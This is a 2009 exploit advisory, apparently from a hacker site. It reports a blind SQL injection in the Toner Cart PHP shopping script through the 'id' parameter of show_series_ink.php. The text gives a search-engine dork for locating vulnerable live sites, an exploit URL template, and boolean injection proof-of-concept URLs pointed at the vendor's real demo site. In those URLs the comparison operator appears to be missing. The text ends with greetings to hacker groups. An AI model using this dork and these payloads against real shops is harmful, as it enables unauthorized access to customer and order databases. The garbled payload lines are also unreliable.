[x]========================================================================================================================================[x]
 |                                                      AntiSecurity[dot]org                                                                |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Title    		: Toner Cart show_series_ink.php?id= blind sql Vulnerabilities							    |
 | Software 		: Toner Cart													    |
 | Vendor   		: http://www.vastal.com/											    |
 | Demo			: http://www.vastal.com/united/											    |
 | Price		: $400.00													    |
 | Date    		: 23 September 2009 ( Indonesia )										    |
 | Author   		: OoN_Boy													    |
 | Contact  		: oon.boy9@gmail.com												    |
 | Web	    		: http://oonboy.info												    |
 | Blog     		: http://oonboy.blogspot.com											    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Description 		: Toner cart has all features needed for a toner business to go online. You can separate all the differentiate      |
 |			  different types of toners from ribbons to inkjets to laser toners all can be added separately in the system. We   |
 |			  divided the system into 3 parts so that it is easy for a customer to find a product they are interested in. The 3 |
 |			  parts include : Brands, Series, Sub Series and then products, we also provided an extensive search for the system |
 |			  so that customers can search for the products they want. The script has a built in affiliate system and ads 	    |
 |			  management and is fully integrated with paypal and verisign. We have also provided an extensive admin panel so    |
 |			  that you can manage all the chores with ease. Please feel free to ask any questions, We will be more than glad to |
 |			  answer them. Please note this is a open database so there might be some problems relating to images and data on   |
 |			  the server when our customers and visitors try to edit it. But we upload the default database every week	    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | dork 		: inurl: show_series_ink.php?id= "Powered by Vastal I-Tech & Co"				 	 	    |
[x]========================================================================================================================================[x]



[x]========================================================================================================================================[x]
 | Exploit 		: http://localhost/[path]/show_series_ink.php?id=[sql]						 	 	    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Proof of concept	: http://www.vastal.com/united/show_series_ink.php?id=5+and+substring(@@version,1,1)5 True			    |
 |			  http://www.vastal.com/united/show_series_ink.php?id=5+and+substring(@@version,1,1)5 False			    |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Greetz		: antisecurity.org batamhacker.or.id                                                                                |
 |		 	  h4ntu Vrs-hCk NoGe Paman zxvf Angela Zhang aJe H312Y yooogy mousekill }^-^{ martfella noname s4va                 |
 | 		  	  k1tk4t str0ke kaka11 ^s0n g0ku^ Joe Chawanua Ntc xx_user s3t4n IrcMafia em|nem Pandoe Ronny rere                  |
[x]========================================================================================================================================[x]




[x]========================================================================================================================================[x]
 | Note			: Please help to vote me in http://8.17.84.100/planyouradventour/profil_team.php?uid_group=1466598338		    |
[x]========================================================================================================================================[x]